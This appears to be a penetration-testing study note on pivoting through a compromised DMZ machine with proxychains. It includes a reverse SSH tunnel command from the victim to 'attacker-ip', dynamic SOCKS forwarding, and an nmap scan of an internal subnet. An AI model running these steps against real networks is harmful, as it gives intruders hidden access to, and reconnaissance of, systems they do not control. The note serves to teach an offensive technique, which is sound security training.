Proxychains

Goals

• To complement the dynamic port forwarding
• To run any network tool through HTTP, SOCKS4, and SOCKS5 proxies.
• Attacker traffics ====> port 8080 of attacker =====> SSH reverse shell =======> auto-select port in victim PC (based on application protocol).

Connect to DMZ networks via compromised DMZ PC

To check for listening port

• netstat -lntp

In victim DMZ PC, to create reverse SSH tunnel from compromised DMZ PC (port 22) to attacker PC (port 2222)

• ssh -f -N root@attacker-ip -R 2222:127.0.0.1:22
• Port 2222 is listening port in attacker
• -f: To run in background
• -N: Do not execute remote command. For port forwarding.
• -R: Reverse

In attacker PC, to create dynamic port forwarding from port 8080 to SSH tunnel at port 2222

• ssh -f -N -D 127.0.0.1:8080 -p 2222 victim-DMZ-user@127.0.0.1

In attacker PC, to use proxychains to connect to all DMZ network

• proxychains nmap --top-ports=20 -sT -Pn 172.16.40.0/24
• proxychain will listen to port 8080
• SSH tunnel acts as a SOCKS server.
• 172.16.40.0/24 is sample DMZ network